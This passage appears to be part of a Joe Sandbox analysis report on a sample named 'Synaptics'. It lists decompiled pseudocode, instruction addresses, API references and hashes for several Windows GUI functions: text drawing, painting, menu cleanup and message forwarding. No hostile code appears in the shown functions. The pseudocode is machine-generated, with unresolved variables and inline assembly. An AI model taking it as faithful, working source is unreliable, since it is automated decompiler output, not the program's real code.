                                                                                                                                                                                          0x00415732
                                                                                                                                                                                          0x00415735
                                                                                                                                                                                          0x00415738
                                                                                                                                                                                          0x00415742
                                                                                                                                                                                          0x0041574d
                                                                                                                                                                                          0x0041575c
                                                                                                                                                                                          0x0041575e
                                                                                                                                                                                          0x0041575e
                                                                                                                                                                                          0x00415765
                                                                                                                                                                                          0x00415768
                                                                                                                                                                                          0x0041576b
                                                                                                                                                                                          0x00415778
                                                                                                                                                                                          0x00415778
                                                                                                                                                                                          0x0041571f
                                                                                                                                                                                          0x004156f5
                                                                                                                                                                                          0x004156f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004156f5
                                                                                                                                                                                          0x00415663
                                                                                                                                                                                          0x0041566c
                                                                                                                                                                                          0x004156da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041566e
                                                                                                                                                                                          0x00415671
                                                                                                                                                                                          0x00415672
                                                                                                                                                                                          0x00415679
                                                                                                                                                                                          0x0041567a
                                                                                                                                                                                          0x0041567f
                                                                                                                                                                                          0x00415682
                                                                                                                                                                                          0x00415688
                                                                                                                                                                                          0x00415691
                                                                                                                                                                                          0x0041569c
                                                                                                                                                                                          0x004156ad
                                                                                                                                                                                          0x004156af
                                                                                                                                                                                          0x004156af
                                                                                                                                                                                          0x004156b6
                                                                                                                                                                                          0x004156b9
                                                                                                                                                                                          0x004156bc
                                                                                                                                                                                          0x004156c9
                                                                                                                                                                                          0x004156c9
                                                                                                                                                                                          0x0041566c
                                                                                                                                                                                          0x004155c6
                                                                                                                                                                                          0x004155d0
                                                                                                                                                                                          0x00415645
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004155d2
                                                                                                                                                                                          0x004155d5
                                                                                                                                                                                          0x004155d6
                                                                                                                                                                                          0x004155dd
                                                                                                                                                                                          0x004155de
                                                                                                                                                                                          0x004155e3
                                                                                                                                                                                          0x004155e6
                                                                                                                                                                                          0x004155e9
                                                                                                                                                                                          0x004155f3
                                                                                                                                                                                          0x00415600
                                                                                                                                                                                          0x00415602
                                                                                                                                                                                          0x00415602
                                                                                                                                                                                          0x00415616
                                                                                                                                                                                          0x0041561b
                                                                                                                                                                                          0x0041561e
                                                                                                                                                                                          0x00415621
                                                                                                                                                                                          0x0041562e
                                                                                                                                                                                          0x0041562e
                                                                                                                                                                                          0x004155d0
                                                                                                                                                                                          0x0041547a
                                                                                                                                                                                          0x0041548a
                                                                                                                                                                                          0x00415499
                                                                                                                                                                                          0x004154aa
                                                                                                                                                                                          0x00415535
                                                                                                                                                                                          0x00415536
                                                                                                                                                                                          0x0041553d
                                                                                                                                                                                          0x0041553e
                                                                                                                                                                                          0x00415543
                                                                                                                                                                                          0x00415546
                                                                                                                                                                                          0x0041554c
                                                                                                                                                                                          0x00415555
                                                                                                                                                                                          0x00415564
                                                                                                                                                                                          0x00415566
                                                                                                                                                                                          0x00415566
                                                                                                                                                                                          0x00415574
                                                                                                                                                                                          0x0041557b
                                                                                                                                                                                          0x0041557e
                                                                                                                                                                                          0x00415581
                                                                                                                                                                                          0x0041558e
                                                                                                                                                                                          0x004154b0
                                                                                                                                                                                          0x004154ba
                                                                                                                                                                                          0x0041552a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004154bc
                                                                                                                                                                                          0x004154bf
                                                                                                                                                                                          0x004154c0
                                                                                                                                                                                          0x004154c7
                                                                                                                                                                                          0x004154c8
                                                                                                                                                                                          0x004154cd
                                                                                                                                                                                          0x004154d0
                                                                                                                                                                                          0x004154d3
                                                                                                                                                                                          0x004154dd
                                                                                                                                                                                          0x004154e8
                                                                                                                                                                                          0x004154f7
                                                                                                                                                                                          0x004154f9
                                                                                                                                                                                          0x004154f9
                                                                                                                                                                                          0x00415500
                                                                                                                                                                                          0x00415503
                                                                                                                                                                                          0x00415506
                                                                                                                                                                                          0x00415513
                                                                                                                                                                                          0x00415513
                                                                                                                                                                                          0x004154ba
                                                                                                                                                                                          0x0041548c
                                                                                                                                                                                          0x0041548c
                                                                                                                                                                                          0x00415799
                                                                                                                                                                                          0x0041579d
                                                                                                                                                                                          0x0041579d
                                                                                                                                                                                          0x0041548a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004154C0
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004155D6
                                                                                                                                                                                            • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,00000000,00000000,?,?,00410DED,?,?,00000000,00000000,00410E54,?,00000001,00410AEF,00410AFF), ref: 00417172
                                                                                                                                                                                            • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,00000000,00000000,?,?,00410DED,?,?,00000000,00000000,00410E54,?), ref: 004171DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalInitSectionVariant$EnterLeave
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2777075435-0
                                                                                                                                                                                          • Opcode ID: 79a8be738fdd5b76fe05261d7feacd4b0ebf638a51b2ac71470018fce3bce166
                                                                                                                                                                                          • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79a8be738fdd5b76fe05261d7feacd4b0ebf638a51b2ac71470018fce3bce166
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044AF00 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x44b0e4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0044CE98(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404A58( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404DCC(_v16, 0x44b108);
					if(_t153 != 0) {
						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404C80(_v16);
							_t65 = E00404E80(_v16);
							DrawTextA(E00425C68(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x44b0eb);
							return E004049C0( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E00404C80(_v16);
								_t91 = E00404E80(_v16);
								DrawTextA(E00425C68(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E00424950(0xff00000d);
								_t78 = E00424950(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00425C68(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404C88( &_v16, 0x44b0fc);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                                                                                                                                                          0x0044af00
                                                                                                                                                                                          0x0044af01
                                                                                                                                                                                          0x0044af0b
                                                                                                                                                                                          0x0044af0e
                                                                                                                                                                                          0x0044af11
                                                                                                                                                                                          0x0044af14
                                                                                                                                                                                          0x0044af16
                                                                                                                                                                                          0x0044af1b
                                                                                                                                                                                          0x0044af1c
                                                                                                                                                                                          0x0044af21
                                                                                                                                                                                          0x0044af24
                                                                                                                                                                                          0x0044af29
                                                                                                                                                                                          0x0044af2e
                                                                                                                                                                                          0x0044af32
                                                                                                                                                                                          0x0044af42
                                                                                                                                                                                          0x0044af51
                                                                                                                                                                                          0x0044af54
                                                                                                                                                                                          0x0044af59
                                                                                                                                                                                          0x0044af59
                                                                                                                                                                                          0x0044af59
                                                                                                                                                                                          0x0044af44
                                                                                                                                                                                          0x0044af47
                                                                                                                                                                                          0x0044af47
                                                                                                                                                                                          0x0044af5c
                                                                                                                                                                                          0x0044af5c
                                                                                                                                                                                          0x0044af68
                                                                                                                                                                                          0x0044af70
                                                                                                                                                                                          0x0044af96
                                                                                                                                                                                          0x0044af9e
                                                                                                                                                                                          0x0044afa3
                                                                                                                                                                                          0x0044afe1
                                                                                                                                                                                          0x0044afe6
                                                                                                                                                                                          0x0044afea
                                                                                                                                                                                          0x0044afef
                                                                                                                                                                                          0x0044affb
                                                                                                                                                                                          0x0044b003
                                                                                                                                                                                          0x0044b003
                                                                                                                                                                                          0x0044b008
                                                                                                                                                                                          0x0044b00c
                                                                                                                                                                                          0x0044b0a9
                                                                                                                                                                                          0x0044b0b1
                                                                                                                                                                                          0x0044b0ba
                                                                                                                                                                                          0x0044b0c9
                                                                                                                                                                                          0x0044b0ce
                                                                                                                                                                                          0x0044b0d0
                                                                                                                                                                                          0x0044b0d3
                                                                                                                                                                                          0x0044b0d6
                                                                                                                                                                                          0x0044b0e3
                                                                                                                                                                                          0x0044b012
                                                                                                                                                                                          0x0044b012
                                                                                                                                                                                          0x0044b016
                                                                                                                                                                                          0x0044b020
                                                                                                                                                                                          0x0044b030
                                                                                                                                                                                          0x0044b03d
                                                                                                                                                                                          0x0044b046
                                                                                                                                                                                          0x0044b055
                                                                                                                                                                                          0x0044b062
                                                                                                                                                                                          0x0044b062
                                                                                                                                                                                          0x0044b067
                                                                                                                                                                                          0x0044b06b
                                                                                                                                                                                          0x0044b099
                                                                                                                                                                                          0x0044b0a4
                                                                                                                                                                                          0x0044b06d
                                                                                                                                                                                          0x0044b072
                                                                                                                                                                                          0x0044b07e
                                                                                                                                                                                          0x0044b083
                                                                                                                                                                                          0x0044b085
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044b092
                                                                                                                                                                                          0x0044b092
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044b06b
                                                                                                                                                                                          0x0044b00c
                                                                                                                                                                                          0x0044afa8
                                                                                                                                                                                          0x0044afb6
                                                                                                                                                                                          0x0044afb7
                                                                                                                                                                                          0x0044afb8
                                                                                                                                                                                          0x0044afb9
                                                                                                                                                                                          0x0044afba
                                                                                                                                                                                          0x0044afcf
                                                                                                                                                                                          0x0044afcf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044af72
                                                                                                                                                                                          0x0044af76
                                                                                                                                                                                          0x0044af89
                                                                                                                                                                                          0x0044af91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044af91
                                                                                                                                                                                          0x0044af7e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044af83
                                                                                                                                                                                          0x0044af87
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044af87

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                                                                                                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                                                                                                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Draw$OffsetRectText$Edge
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3610532707-0
                                                                                                                                                                                          • Opcode ID: aa2038870a8fdccfec43aecca8dda92930077ba560af71d0df73fffac7ff7146
                                                                                                                                                                                          • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa2038870a8fdccfec43aecca8dda92930077ba560af71d0df73fffac7ff7146
                                                                                                                                                                                          • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043F3B8 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00441704(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43f4d8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043F510(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43f4df);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00441704(_v8),  &_v84);
				}
				return _t55;
			}


















                                                                                                                                                                                          0x0043f3b9
                                                                                                                                                                                          0x0043f3bb
                                                                                                                                                                                          0x0043f3c1
                                                                                                                                                                                          0x0043f3c4
                                                                                                                                                                                          0x0043f3ca
                                                                                                                                                                                          0x0043f3cf
                                                                                                                                                                                          0x0043f3e3
                                                                                                                                                                                          0x0043f3e3
                                                                                                                                                                                          0x0043f3e7
                                                                                                                                                                                          0x0043f3e8
                                                                                                                                                                                          0x0043f3ed
                                                                                                                                                                                          0x0043f3f0
                                                                                                                                                                                          0x0043f3fd
                                                                                                                                                                                          0x0043f417
                                                                                                                                                                                          0x0043f41a
                                                                                                                                                                                          0x0043f42d
                                                                                                                                                                                          0x0043f430
                                                                                                                                                                                          0x0043f432
                                                                                                                                                                                          0x0043f433
                                                                                                                                                                                          0x0043f435
                                                                                                                                                                                          0x0043f440
                                                                                                                                                                                          0x0043f449
                                                                                                                                                                                          0x0043f45b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f45d
                                                                                                                                                                                          0x0043f479
                                                                                                                                                                                          0x0043f480
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f480
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f482
                                                                                                                                                                                          0x0043f482
                                                                                                                                                                                          0x0043f483
                                                                                                                                                                                          0x0043f483
                                                                                                                                                                                          0x0043f435
                                                                                                                                                                                          0x0043f486
                                                                                                                                                                                          0x0043f48a
                                                                                                                                                                                          0x0043f493
                                                                                                                                                                                          0x0043f493
                                                                                                                                                                                          0x0043f49e
                                                                                                                                                                                          0x0043f3ff
                                                                                                                                                                                          0x0043f406
                                                                                                                                                                                          0x0043f406
                                                                                                                                                                                          0x0043f4aa
                                                                                                                                                                                          0x0043f4b1
                                                                                                                                                                                          0x0043f4b4
                                                                                                                                                                                          0x0043f4b7
                                                                                                                                                                                          0x0043f4bc
                                                                                                                                                                                          0x0043f4c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f4d2
                                                                                                                                                                                          0x0043f4d7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                          • SaveDC.GDI32(?), ref: 0043F412
                                                                                                                                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                                                                                                                                                          • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                                                                                                                                                          • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3808407030-0
                                                                                                                                                                                          • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                          • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044AD40 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0044AD40(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044AD40(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044AE70(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0044AC00(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x449854; // 0x4498a0
						if(E00403D78( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                                                                                                                                                          0x0044ad40
                                                                                                                                                                                          0x0044ad44
                                                                                                                                                                                          0x0044ad4a
                                                                                                                                                                                          0x0044ad54
                                                                                                                                                                                          0x0044ad56
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ad56
                                                                                                                                                                                          0x0044ad5f
                                                                                                                                                                                          0x0044ad64
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ad66
                                                                                                                                                                                          0x0044ad78
                                                                                                                                                                                          0x0044ad7d
                                                                                                                                                                                          0x0044ad81
                                                                                                                                                                                          0x0044ad86
                                                                                                                                                                                          0x0044ad8f
                                                                                                                                                                                          0x0044ad99
                                                                                                                                                                                          0x0044ada0
                                                                                                                                                                                          0x0044adb0
                                                                                                                                                                                          0x0044adb5
                                                                                                                                                                                          0x0044adb5
                                                                                                                                                                                          0x0044adb7
                                                                                                                                                                                          0x0044adb8
                                                                                                                                                                                          0x0044adbe
                                                                                                                                                                                          0x0044adc4
                                                                                                                                                                                          0x0044adf9
                                                                                                                                                                                          0x0044adfb
                                                                                                                                                                                          0x0044ae00
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ae06
                                                                                                                                                                                          0x0044adc9
                                                                                                                                                                                          0x0044add6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ade9
                                                                                                                                                                                          0x0044aded
                                                                                                                                                                                          0x0044adf4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044adf4
                                                                                                                                                                                          0x0044add6
                                                                                                                                                                                          0x0044adbe
                                                                                                                                                                                          0x0044ae0d

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                          • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A390 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E00441704(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                                                                                                                                          0x0045a390
                                                                                                                                                                                          0x0045a394
                                                                                                                                                                                          0x0045a396
                                                                                                                                                                                          0x0045a398
                                                                                                                                                                                          0x0045a39a
                                                                                                                                                                                          0x0045a3a2
                                                                                                                                                                                          0x0045a441
                                                                                                                                                                                          0x0045a447
                                                                                                                                                                                          0x0045a3b3
                                                                                                                                                                                          0x0045a3b8
                                                                                                                                                                                          0x0045a3bc
                                                                                                                                                                                          0x0045a422
                                                                                                                                                                                          0x0045a43f
                                                                                                                                                                                          0x0045a43f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a422
                                                                                                                                                                                          0x0045a3be
                                                                                                                                                                                          0x0045a3c0
                                                                                                                                                                                          0x0045a3c0
                                                                                                                                                                                          0x0045a3c5
                                                                                                                                                                                          0x0045a3e0
